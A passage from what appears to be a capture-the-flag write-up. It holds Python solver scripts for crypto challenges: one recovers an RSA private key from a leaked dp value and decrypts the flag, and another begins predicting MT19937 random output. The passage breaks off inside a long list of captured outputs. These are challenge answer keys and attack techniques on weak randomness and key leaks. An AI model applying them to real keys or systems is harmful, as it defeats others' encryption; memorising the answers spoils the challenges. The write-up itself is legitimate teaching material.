class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># py2</span><br><span class="hljs-keyword">import</span> random<br><span class="hljs-keyword">import</span> gmpy2<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><br>n =<br><span class="hljs-number">144573683990296079611135474661197492569962285163118264304760128514</span><br><span class="hljs-number">378450625043070474838075626723354220121948920313400664358341070757</span><br><span class="hljs-number">676498630899262349227958025807395866103391135742530910291132519036</span><br><span class="hljs-number">950667849498017553807524999532071920009738654477379676790400942232</span><br><span class="hljs-number">810106883328105428161410721145229679023998881</span><br>c =<br><span class="hljs-number">140936410048438311250552166359315531524717850408136878422422753861</span><br><span class="hljs-number">467709727494132943441793325459384490656351395836085596063714127829</span><br><span class="hljs-number">696538515364822908513326788824368390411397265861249839989684310498</span><br><span class="hljs-number">194231709180660320399728106109349119244510966442534818280589033645</span><br><span class="hljs-number">304725341767217060885195904689618851168472021</span><br>res = [<br> <span class="hljs-number">224</span>, <span class="hljs-number">32</span>, <span class="hljs-number">63</span>, <span class="hljs-number">37</span>, <span class="hljs-number">139</span>, <span class="hljs-number">9</span>, <span class="hljs-number">37</span>, <span class="hljs-number">205</span>, <span class="hljs-number">108</span>, <span class="hljs-number">41</span>, <span class="hljs-number">237</span>, <span class="hljs-number">68</span>, <span class="hljs-number">40</span>, <span class="hljs-number">206</span>,<br><span class="hljs-number">48</span>, <span class="hljs-number">112</span>, <span class="hljs-number">239</span>,<br> <span class="hljs-number">85</span>, <span class="hljs-number">232</span>, <span class="hljs-number">0</span>, <span class="hljs-number">168</span>, <span class="hljs-number">105</span>, <span class="hljs-number">214</span>, <span class="hljs-number">13</span>, <span class="hljs-number">185</span>, <span class="hljs-number">107</span>, <span class="hljs-number">27</span>, <span class="hljs-number">176</span>, <span class="hljs-number">219</span>, <span class="hljs-number">55</span>,<br><span class="hljs-number">128</span>, <span class="hljs-number">25</span>, <span class="hljs-number">80</span>,<br> <span class="hljs-number">249</span>, <span class="hljs-number">88</span>, <span class="hljs-number">86</span>, <span class="hljs-number">32</span>, <span class="hljs-number">6</span>, <span class="hljs-number">110</span>, <span class="hljs-number">20</span>, <span class="hljs-number">171</span>, <span class="hljs-number">220</span>, <span class="hljs-number">249</span>, <span class="hljs-number">251</span>, <span class="hljs-number">26</span>, <span class="hljs-number">52</span>, <span class="hljs-number">149</span>,<br><span class="hljs-number">234</span>, <span class="hljs-number">60</span>, <span class="hljs-number">145</span>,<br> <span class="hljs-number">126</span>, <span class="hljs-number">25</span>, <span class="hljs-number">207</span>, <span class="hljs-number">5</span>, <span class="hljs-number">42</span>, <span class="hljs-number">0</span>, <span class="hljs-number">199</span>, <span class="hljs-number">155</span>, <span class="hljs-number">56</span>, <span class="hljs-number">142</span>, <span class="hljs-number">199</span>, <span class="hljs-number">37</span>, <span class="hljs-number">4</span>, <span class="hljs-number">76</span>,<br><span class="hljs-number">173</span>, <span class="hljs-number">138</span>, <span class="hljs-number">195</span>,<br> <span class="hljs-number">112</span>, <span class="hljs-number">145</span>, <span class="hljs-number">123</span>, <span class="hljs-number">175</span>, <span class="hljs-number">178</span>, <span class="hljs-number">123</span>, <span class="hljs-number">73</span>, <span class="hljs-number">32</span>, <span class="hljs-number">223</span>, <span class="hljs-number">200</span>, <span class="hljs-number">254</span>, <span class="hljs-number">135</span>, <span class="hljs-number">94</span>,<br><span class="hljs-number">156</span>, <span class="hljs-number">97</span>, <span class="hljs-number">67</span>,<br> <span class="hljs-number">252</span>, <span class="hljs-number">31</span>, <span class="hljs-number">179</span>, <span class="hljs-number">245</span>, <span class="hljs-number">231</span>, <span class="hljs-number">90</span>, <span class="hljs-number">60</span>, <span class="hljs-number">77</span>, <span class="hljs-number">63</span>, <span class="hljs-number">167</span>, <span class="hljs-number">33</span>, <span class="hljs-number">136</span>, <span class="hljs-number">40</span>, <span class="hljs-number">210</span>,<br><span class="hljs-number">219</span>, <span class="hljs-number">226</span>,<br> <span class="hljs-number">164</span>, <span class="hljs-number">164</span>, <span class="hljs-number">45</span>, <span class="hljs-number">122</span>, <span class="hljs-number">85</span>, <span class="hljs-number">29</span>, <span class="hljs-number">59</span>, <span class="hljs-number">86</span>, <span class="hljs-number">123</span>, <span class="hljs-number">251</span>, <span class="hljs-number">126</span>, <span class="hljs-number">37</span>, <span class="hljs-number">9</span>, <span class="hljs-number">119</span>,<br><span class="hljs-number">45</span>, <span class="hljs-number">142</span>, <span class="hljs-number">187</span>,<br> <span class="hljs-number">7</span>, <span class="hljs-number">57</span>, <span class="hljs-number">84</span>, <span class="hljs-number">169</span>, <span class="hljs-number">82</span>, <span class="hljs-number">192</span>, <span class="hljs-number">244</span>, <span class="hljs-number">191</span>, <span class="hljs-number">62</span>, <span class="hljs-number">62</span>, <span class="hljs-number">37</span>, <span class="hljs-number">25</span>, <span class="hljs-number">160</span>, <span class="hljs-number">141</span>,<br><span class="hljs-number">248</span>, <span class="hljs-number">147</span>, <span class="hljs-number">128</span>,<br> <span class="hljs-number">236</span>, <span class="hljs-number">123</span>, <span class="hljs-number">64</span>, <span class="hljs-number">177</span>, <span class="hljs-number">110</span>, <span class="hljs-number">50</span>, <span class="hljs-number">39</span>, <span class="hljs-number">143</span>, <span class="hljs-number">73</span>, <span class="hljs-number">172</span>, <span class="hljs-number">35</span>, <span class="hljs-number">4</span>, <span class="hljs-number">15</span>, <span class="hljs-number">180</span>,<br><span class="hljs-number">101</span>, <span class="hljs-number">78</span>, <span class="hljs-number">46</span>,<br> <span class="hljs-number">164</span>, <span class="hljs-number">35</span>, <span class="hljs-number">242</span>, <span class="hljs-number">70</span><br>]<br>seeds = [<br> <span class="hljs-number">9999</span>, <span class="hljs-number">1247</span>, <span class="hljs-number">5097</span>, <span class="hljs-number">7717</span>, <span class="hljs-number">7026</span>, <span class="hljs-number">8398</span>, <span class="hljs-number">961</span>, <span class="hljs-number">3156</span>, <span class="hljs-number">1271</span>, <span class="hljs-number">7473</span>,<br><span class="hljs-number">3669</span>, <span class="hljs-number">6716</span>,<br> <span class="hljs-number">7550</span>, <span class="hljs-number">1426</span>, <span class="hljs-number">8065</span>, <span class="hljs-number">351</span>, <span class="hljs-number">738</span>, <span class="hljs-number">4057</span>, <span class="hljs-number">877</span>, <span class="hljs-number">4029</span>, <span class="hljs-number">7606</span>, <span class="hljs-number">1822</span>, <span class="hljs-number">7749</span>,<br><span class="hljs-number">7973</span>, <span class="hljs-number">9666</span>,<br> <span class="hljs-number">5927</span>, <span class="hljs-number">7944</span>, <span class="hljs-number">1240</span>, <span class="hljs-number">8960</span>, <span class="hljs-number">443</span>, <span class="hljs-number">6349</span>, <span class="hljs-number">5949</span>, <span class="hljs-number">5913</span>, <span class="hljs-number">2332</span>, <span class="hljs-number">7255</span>,<br><span class="hljs-number">5185</span>, <span class="hljs-number">5504</span>,<br> <span class="hljs-number">3499</span>, <span class="hljs-number">8855</span>, <span class="hljs-number">4183</span>, <span class="hljs-number">8812</span>, <span class="hljs-number">5865</span>, <span class="hljs-number">4147</span>, <span class="hljs-number">5091</span>, <span class="hljs-number">4556</span>, <span class="hljs-number">1968</span>, <span class="hljs-number">5589</span>,<br><span class="hljs-number">2481</span>, <span class="hljs-number">3411</span>,<br> <span class="hljs-number">514</span>, <span class="hljs-number">589</span>, <span class="hljs-number">8078</span>, <span class="hljs-number">9590</span>, <span class="hljs-number">1765</span>, <span class="hljs-number">1009</span>, <span class="hljs-number">4415</span>, <span class="hljs-number">6603</span>, <span class="hljs-number">3978</span>, <span class="hljs-number">9215</span>,<br><span class="hljs-number">5307</span>, <span class="hljs-number">3804</span>, <span class="hljs-number">1141</span>,<br> <span class="hljs-number">6691</span>, <span class="hljs-number">1760</span>, <span class="hljs-number">101</span>, <span class="hljs-number">7008</span>, <span class="hljs-number">6165</span>, <span class="hljs-number">9974</span>, <span class="hljs-number">1194</span>, <span class="hljs-number">3665</span>, <span class="hljs-number">7579</span>, <span class="hljs-number">1148</span>,<br><span class="hljs-number">5786</span>, <span class="hljs-number">6175</span>,<br> <span class="hljs-number">1333</span>, <span class="hljs-number">7932</span>, <span class="hljs-number">8217</span>, <span class="hljs-number">9058</span>, <span class="hljs-number">5400</span>, <span class="hljs-number">6527</span>, <span class="hljs-number">6220</span>, <span class="hljs-number">1111</span>, <span class="hljs-number">4265</span>, <span class="hljs-number">208</span>,<br><span class="hljs-number">2191</span>, <span class="hljs-number">9706</span>,<br> <span class="hljs-number">1019</span>, <span class="hljs-number">7249</span>, <span class="hljs-number">7644</span>, <span class="hljs-number">907</span>, <span class="hljs-number">5679</span>, <span class="hljs-number">3335</span>, <span class="hljs-number">3181</span>, <span class="hljs-number">5301</span>, <span class="hljs-number">4977</span>, <span class="hljs-number">2455</span>,<br><span class="hljs-number">724</span>, <span class="hljs-number">4447</span>, <span class="hljs-number">3566</span>,<br> <span class="hljs-number">9161</span>, <span class="hljs-number">1289</span>, <span class="hljs-number">181</span>, <span class="hljs-number">3509</span>, <span class="hljs-number">6305</span>, <span class="hljs-number">8183</span>, <span class="hljs-number">4024</span>, <span class="hljs-number">2630</span>, <span class="hljs-number">131</span>, <span class="hljs-number">1822</span>,<br><span class="hljs-number">8918</span>, <span class="hljs-number">5595</span>, <span class="hljs-number">6849</span>,<br> <span class="hljs-number">2555</span>, <span class="hljs-number">4221</span>, <span class="hljs-number">3023</span>, <span class="hljs-number">5828</span>, <span class="hljs-number">5622</span>, <span class="hljs-number">5812</span>, <span class="hljs-number">2378</span>, <span class="hljs-number">746</span>, <span class="hljs-number">3608</span>, <span class="hljs-number">822</span>,<br><span class="hljs-number">4856</span>, <span class="hljs-number">6987</span>, <span class="hljs-number">9977</span>,<br> <span class="hljs-number">5289</span>, <span class="hljs-number">342</span>, <span class="hljs-number">5418</span>, <span class="hljs-number">9974</span>, <span class="hljs-number">5291</span>, <span class="hljs-number">6895</span>, <span class="hljs-number">9663</span>, <span class="hljs-number">3642</span>, <span class="hljs-number">2965</span>, <span class="hljs-number">8003</span>,<br><span class="hljs-number">5830</span>, <span class="hljs-number">6373</span>,<br> <span class="hljs-number">3394</span>, <span class="hljs-number">8308</span>, <span class="hljs-number">6754</span>, <span class="hljs-number">4843</span>, <span class="hljs-number">2100</span>, <span class="hljs-number">1355</span>, <span class="hljs-number">5166</span>, <span class="hljs-number">601</span>, <span class="hljs-number">9987</span>, <span class="hljs-number">8921</span>,<br><span class="hljs-number">7563</span>, <span class="hljs-number">2250</span>,<br> <span class="hljs-number">9056</span>, <span class="hljs-number">2873</span>, <span class="hljs-number">7479</span>, <span class="hljs-number">5508</span>, <span class="hljs-number">109</span><br>]<br>dp = <span class="hljs-string">''</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(seeds)):<br> random.seed(seeds[i])<br> rands = []<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">4</span>):<br> rands.append(random.randint(<span class="hljs-number">0</span>, <span class="hljs-number">255</span>))<br> dp += <span class="hljs-built_in">chr</span>(rands[i % <span class="hljs-number">4</span>] ^ res[i])<br>dp = <span class="hljs-built_in">int</span>(dp)<br>e = <span class="hljs-number">0x10001</span><br><br>n =<br><span class="hljs-number">144573683990296079611135474661197492569962285163118264304760128514</span><br><span class="hljs-number">378450625043070474838075626723354220121948920313400664358341070757</span><br><span class="hljs-number">676498630899262349227958025807395866103391135742530910291132519036</span><br><span class="hljs-number">950667849498017553807524999532071920009738654477379676790400942232</span><br><span class="hljs-number">810106883328105428161410721145229679023998881</span><br>c =<br><span class="hljs-number">140936410048438311250552166359315531524717850408136878422422753861</span><br><span class="hljs-number">467709727494132943441793325459384490656351395836085596063714127829</span><br><span class="hljs-number">696538515364822908513326788824368390411397265861249839989684310498</span><br><span class="hljs-number">194231709180660320399728106109349119244510966442534818280589033645</span><br><span class="hljs-number">304725341767217060885195904689618851168472021</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, e):<br> <span class="hljs-keyword">if</span> (dp * e - <span class="hljs-number">1</span>) % i == <span class="hljs-number">0</span>:<br> <span class="hljs-keyword">if</span> n % (((dp * e - <span class="hljs-number">1</span>) // i) + <span class="hljs-number">1</span>) == <span class="hljs-number">0</span>:<br> p = ((dp * e - <span class="hljs-number">1</span>) // i) + <span class="hljs-number">1</span><br> q = n // p<br> phi = (q - <span class="hljs-number">1</span>) * (p - <span class="hljs-number">1</span>)<br> d = gmpy2.invert(e, phi)<br> m = <span class="hljs-built_in">pow</span>(c, d, n)<br> <span class="hljs-built_in">print</span>(n2s(m))<br></code></pre></td></tr></table></figure><h4 id="random2"><a href="#random2" class="headerlink" title="random2"></a>random2</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> Crypto.Util.number <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES<br><span class="hljs-keyword">from</span> mt19937predictor <span class="hljs-keyword">import</span> MT19937Predictor<br><br>keys = [<span class="hljs-number">74737492451949886796883447380</span>,<br><span class="hljs-number">51358027370976380985099489502</span>,<br><span class="hljs-number">412762483065178295255791439485932171376749700084</span>, <span class="hljs-number">910689806</span>,<br><span class="hljs-number">1149695904</span>, <span class="hljs-number">3104053370</span>, <span class="hljs-number">221975799</span>, <span class="hljs-number">3823412020</span>, <span class="hljs-number">958468189</span>,<br><span class="hljs-number">3586356097</span>, <span class="hljs-number">340817801</span>, <span class="hljs-number">2878068849</span>, <span class="hljs-number">2732757663</span>, <span class="hljs-number">2018092082</span>,<br><span class="hljs-number">1847897227</span>, <span class="hljs-number">1759748212</span>, <span class="hljs-number">1295396426</span>, <span class="hljs-number">2794984001</span>, <span class="hljs-number">4265922173</span>,<br><span class="hljs-number">3532941962</span>, <span class="hljs-number">3649453440</span>, <span class="hljs-number">1086966694</span>, <span class="hljs-number">2188196779</span>, <span class="hljs-number">1036830362</span>,<br><span class="hljs-number">3114332204</span>, <span class="hljs-number">2720067903</span>, <span class="hljs-number">3763019658</span>, <span class="hljs-number">4220680032</span>, <span class="hljs-number">1434665040</span>,<br><span class="hljs-number">2867449357</span>, <span class="hljs-number">327630472</span>, <span class="hljs-number">4028025891</span>, <span class="hljs-number">1107232876</span>, <span class="hljs-number">1341894502</span>,<br><span class="hljs-number">3410775936</span>, <span class="hljs-number">792029308</span>, <span class="hljs-number">2140406850</span>, <span class="hljs-number">618481849</span>, <span class="hljs-number">3329607978</span>,<br><span class="hljs-number">1024829298</span>, <span class="hljs-number">1620771375</span>, <span class="hljs-number">1042727260</span>, <span class="hljs-number">1141119170</span>, <span class="hljs-number">2850063412</span>,<br><span class="hljs-number">722634918</span>, <span class="hljs-number">109575186</span>, <span class="hljs-number">1993029882</span>, <span class="hljs-number">2096912385</span>, <span class="hljs-number">866181039</span>,<br><span class="hljs-number">827908342</span>, <span class="hljs-number">1718528485</span>, <span class="hljs-number">1617437693</span>, <span class="hljs-number">3893036959</span>, <span class="hljs-number">2846991704</span>,<br><span class="hljs-number">3366375532</span>, <span class="hljs-number">2763086122</span>, <span class="hljs-number">2690998389</span>, <span class="hljs-number">1148589641</span>, <span class="hljs-number">1571939581</span>,<br><span class="hljs-number">2933947318</span>, <span class="hljs-number">4121295833</span>, <span class="hljs-number">3030689848</span>, <span class="hljs-number">1790011374</span>, <span class="hljs-number">109272014</span>,<br><span class="hljs-number">121093659</span>, <span class="hljs-number">4007439172</span>, <span class="hljs-number">831512040</span>, <span class="hljs-number">978840109</span>, <span class="hljs-number">3000990210</span>,<br><span class="hljs-number">3025633350</span>, <span class="hljs-number">1335144143</span>, <span class="hljs-number">4107810622</span>, <span class="hljs-number">1035611013</span>, <span class="hljs-number">3925921218</span>,<br><span class="hljs-number">1398042454</span>, <span class="hljs-number">1123546694</span>, <span class="hljs-number">4161792772</span>, <span class="hljs-number">1177640646</span>, <span class="hljs-number">4066189210</span>,<br><span class="hljs-number">2240592239</span>, <span class="hljs-number">508327944</span>, <span class="hljs-number">839225012</span>, <span class="hljs-number">1605466793</span>, <span class="hljs-number">2875695963</span>,<br><span class="hljs-number">626270177</span>, <span class="hljs-number">1371375933</span>, <span class="hljs-number">11364760</span>, <span class="hljs-number">3470778132</span>, <span class="hljs-number">1706915094</span>,<br><span class="hljs-number">1458410373</span>, <span class="hljs-number">98854289</span>, <span class="hljs-number">1392252258</span>, <span class="hljs-number">1560427103</span>, <span class="hljs-number">3615589636</span>,<br><span class="hljs-number">147666569</span>, <span class="hljs-number">1045773025</span>, <span class="hljs-number">4263298490</span>, <span class="hljs-number">3895751869</span>, <span class="hljs-number">2691680307</span>,<br><span class="hljs-number">1699526232</span>, <span class="hljs-number">3685180876</span>, <span class="hljs-number">729503966</span>, <span class="hljs-number">554847696</span>, <span class="hljs-number">1562590775</span>,<br><span class="hljs-number">3563661002</span>, <span class="hljs-number">963617489</span>, <span class="hljs-number">3181526105</span>, <span class="hljs-number">2184215744</span>, <span class="hljs-number">2144648457</span>,<br><span class="hljs-number">1109270973</span>, <span class="hljs-number">3071342721</span>, <span class="hljs-number">2842429183</span>, <span class="hljs-number">668733579</span>, <span class="hljs-number">1262667392</span>,<br><span class="hljs-number">772190169</span>, <span class="hljs-number">1000365415</span>, <span class="hljs-number">3453506497</span>, <span class="hljs-number">412844225</span>, <span class="hljs-number">9975293</span>, <span class="hljs-number">919025159</span>,<br><span class="hljs-number">3317679250</span>, <span class="hljs-number">2335686357</span>, <span class="hljs-number">1608848888</span>, <span class="hljs-number">2579223536</span>, <span class="hljs-number">1816878070</span>,<br><span class="hljs-number">3734808856</span>, <span class="hljs-number">269077113</span>, <span class="hljs-number">2396885783</span>, <span class="hljs-number">1147867931</span>, <span class="hljs-number">2331502665</span>,<br><span class="hljs-number">2928315805</span>, <span class="hljs-number">908907677</span>, <span class="hljs-number">1009287219</span>, <span class="hljs-number">1017406485</span>, <span class="hljs-number">3870217028</span>,<br><span class="hljs-number">1835376973</span>, <span class="hljs-number">890949168</span>, <span class="hljs-number">671845795</span>, <span class="hljs-number">3380480668</span>, <span class="hljs-number">4171623559</span>,<br><span class="hljs-number">1662988401</span>, <span class="hljs-number">3709126631</span>, <span class="hljs-number">2520677766</span>, <span class="hljs-number">1660449390</span>, <span class="hljs-number">120494599</span>,<br><span class="hljs-number">907225530</span>, <span class="hljs-number">3665272463</span>, <span class="hljs-number">136171352</span>, <span class="hljs-number">1758076339</span>, <span class="hljs-number">3009587924</span>,<br><span class="hljs-number">2866084549</span>, <span class="hljs-number">3656368543</span>, <span class="hljs-number">1692972691</span>, <span class="hljs-number">714237605</span>, <span class="hljs-number">892521830</span>,<br><span class="hljs-number">1942496649</span>, <span class="hljs-number">4241764492</span>, <span class="hljs-number">930308540</span>, <span class="hljs-number">3340229942</span>, <span class="hljs-number">773043293</span>,<br><span class="hljs-number">3514688079</span>, <span class="hljs-number">1318180965</span>, <span class="hljs-number">1669012263</span>, <span class="hljs-number">3638042505</span>, <span class="hljs-number">3025395295</span>,<br><span class="hljs-number">226129302</span>, <span class="hljs-number">153479541</span>, <span class="hljs-number">2764571825</span>, <span class="hljs-number">3421587858</span>, <span class="hljs-number">334668853</span>,<br><span class="hljs-number">1330796170</span>, <span class="hljs-number">218556632</span>, <span class="hljs-number">972714166</span>, <span class="hljs-number">922603164</span>, <span class="hljs-number">4024647445</span>,<br><span class="hljs-number">4233196368</span>, <span class="hljs-number">1249046751</span>, <span class="hljs-number">3667925019</span>, <span class="hljs-number">2276336634</span>, <span class="hljs-number">3644888947</span>,<br><span class="hljs-number">1444996806</span>, <span class="hljs-number">413210699</span>, <span class="hljs-number">2208048223</span>, <span class="hljs-number">3813568258</span>, <span class="hljs-number">2345486173</span>,<br><span class="hljs-number">487998086</span>, <span class="hljs-number">477969329</span>, <span class="hljs-number">3409170127</span>, <span class="hljs-number">3568976035</span>, <span class="hljs-number">3460493127</span>,<br><span class="hljs-number">2697206478</span>, <span class="hljs-number">1262489351</span>, <span class="hljs-number">4011219190</span>, <span class="hljs-number">1419296521</span>, <span class="hljs-number">1307871567</span>,<br><span class="hljs-number">270455245</span>, <span class="hljs-number">4245043905</span>, <span class="hljs-number">687578193</span>, <span class="hljs-number">1070246561</span>, <span class="hljs-number">185531160</span>,<br><span class="hljs-number">2626503659</span>, <span class="hljs-number">3372671141</span>, <span class="hljs-number">3673238883</span>, <span class="hljs-number">2542194104</span>, <span class="hljs-number">4260369384</span>,<br><span class="hljs-number">67076509</span>, <span class="hljs-number">4164858072</span>, <span class="hljs-number">3344428349</span>, <span class="hljs-number">2674528215</span>, <span class="hljs-number">2352981085</span>,<br><span class="hljs-number">4188340133</span>, <span class="hljs-number">2490407345</span>, <span class="hljs-number">2277623345</span>, <span class="hljs-number">578009254</span>, <span class="hljs-number">589898778</span>,<br><span class="hljs-number">2257425250</span>, <span class="hljs-number">4264855682</span>, <span class="hljs-number">3217088425</span>, <span class="hljs-number">1918678675</span>, <span class="hljs-number">2409396248</span>,<br><span class="hljs-number">366216060</span>, <span class="hljs-number">2318262020</span>, <span class="hljs-number">2695905062</span>, <span class="hljs-number">1588352782</span>, <span class="hljs-number">1427064824</span>,<br><span class="hljs-number">470125313</span>, <span class="hljs-number">3305196643</span>, <span class="hljs-number">1839661592</span>, <span class="hljs-number">2584820258</span>, <span class="hljs-number">299694866</span>,<br><span class="hljs-number">4205679150</span>, <span class="hljs-number">3105720803</span>, <span class="hljs-number">2804340888</span>, <span class="hljs-number">3893613342</span>, <span class="hljs-number">733876896</span>,<br><span class="hljs-number">232917987</span>, <span class="hljs-number">2727309654</span>, <span class="hljs-number">1790439074</span>, <span class="hljs-number">1927738154</span>, <span class="hljs-number">4017472905</span>,<br><span class="hljs-number">1863059250</span>, <span class="hljs-number">655457188</span>, <span class="hljs-number">3759472447</span>, <span class="hljs-number">4183317773</span>, <span class="hljs-number">797877611</span>,<br><span class="hljs-number">2699417810</span>, <span class="hljs-number">803278050</span>, <span class="hljs-number">3877877653</span>, <span class="hljs-number">1586583099</span>, <span class="hljs-number">3875432289</span>,<br><span class="hljs-number">111221042</span>, <span class="hljs-number">233407522</span>, <span class="hljs-number">3347300855</span>, <span class="hljs-number">3873882496</span>, <span class="hljs-number">3741842610</span>,<br><span class="hljs-number">717425034</span>, <span class="hljs-number">2557158550</span>, <span class="hljs-number">876205693</span>, <span class="hljs-number">683472955</span>, <span class="hljs-number">3676324193</span>,<br><span class="hljs-number">758448123</span>, <span class="hljs-number">1995439610</span>, <span class="hljs-number">2943722151</span>, <span class="hljs-number">1610689376</span>, <span class="hljs-number">4230997558</span>,<br><span class="hljs-number">802060680</span>, <span class="hljs-number">2861576590</span>, <span class="hljs-number">960427169</span>, <span class="hljs-number">2361123516</span>, <span class="hljs-number">2886027757</span>,<br><span class="hljs-number">271492995</span>, <span class="hljs-number">3597341957</span>, <span class="hljs-number">1973308613</span>, <span class="hljs-number">687254699</span>, <span class="hljs-number">2103809719</span>,<br><span class="hljs-number">1260885931</span>, <span class="hljs-number">2906748062</span>, <span class="hljs-number">873332944</span>, <span class="hljs-number">3671891228</span>, <span class="hljs-number">2490863425</span>,<br><span class="hljs-number">274650518</span>, <span class="hljs-number">990260178</span>, <span class="hljs-number">989305697</span>, <span class="hljs-number">3765783495</span>, <span class="hljs-number">3579353903</span>,<br><span class="hljs-number">1372910559</span>, <span class="hljs-number">165320956</span>, <span class="hljs-number">896735304</span>, <span class="hljs-number">3564054930</span>, <span class="hljs-number">2374613969</span>,<br><span class="hljs-number">786938917</span>, <span class="hljs-number">3955168292</span>, <span class="hljs-number">2134822172</span>, <span class="hljs-number">1403480802</span>, <span class="hljs-number">1340392765</span>,<br><span class="hljs-number">3154014116</span>, <span class="hljs-number">1793814283</span>, <span class="hljs-number">1981841272</span>, <span class="hljs-number">1873394217</span>, <span class="hljs-number">4217089972</span>,<br><span class="hljs-number">3403224767</span>, <span class="hljs-number">111486932</span>, <span class="hljs-number">1370301502</span>, <span class="hljs-number">1137722044</span>, <span class="hljs-number">1454768737</span>,<br><span class="hljs-number">2817161685</span>, <span class="hljs-number">1373532601</span>, <span class="hljs-number">88198402</span>, <span class="hljs-number">1162901466</span>, <span class="hljs-number">1764878443</span>,<br><span class="hljs-number">3204368881</span>, <span class="hljs-number">764246346</span>, <span class="hljs-number">3192119660</span>, <span class="hljs-number">876165427</span>, <span class="hljs-number">4104033361</span>,<br><span class="hljs-number">2154934077</span>, <span class="hljs-number">1561430573</span>, <span class="hljs-number">826991304</span>, <span class="hljs-number">849458135</span>, <span class="hljs-number">4188058136</span>,<br><span class="hljs-number">1199351023</span>, <span class="hljs-number">2127952015</span>, <span class="hljs-number">2094038064</span>, <span class="hljs-number">300699273</span>, <span class="hljs-number">3378157804</span>,<br><span class="hljs-number">6679715</span>, <span class="hljs-number">559293910</span>, <span class="hljs-number">3028818176</span>, <span class="hljs-number">2490265745</span>, <span class="hljs-number">3646800433</span>,<br><span class="hljs-number">1746603729</span>, <span class="hljs-number">1531309519</span>, <span class="hljs-number">18564847</span>, <span class="hljs-number">3452425344</span>, <span class="hljs-number">1989426082</span>,<br><span class="hljs-number">2251367880</span>, <span class="hljs-number">1426356258</span>, <span class="hljs-number">2425736463</span>, <span class="hljs-number">1600248295</span>, <span class="hljs-number">955344576</span>,<br><span class="hljs-number">3502485031</span>, <span class="hljs-number">1323390407</span>, <span class="hljs-number">399691485</span>, <span class="hljs-number">1835777771</span>, <span class="hljs-number">1828335677</span>,<br><span class="hljs-number">3348082301</span>, <span class="hljs-number">3687268482</span>, <span class="hljs-number">2457400649</span>, <span class="hljs-number">3368374393</span>, <span class="hljs-number">1119303358</span>,<br><span class="hljs-number">1270433121</span>, <span class="hljs-number">3059691677</span>, <span class="hljs-number">2392910075</span>, <span class="hljs-number">591224638</span>, <span class="hljs-number">1311675618</span>,<br><span class="hljs-number">4122050325</span>, <span class="hljs-number">4014348903</span>, <span class="hljs-number">2095907405</span>, <span class="hljs-number">1519824911</span>, <span 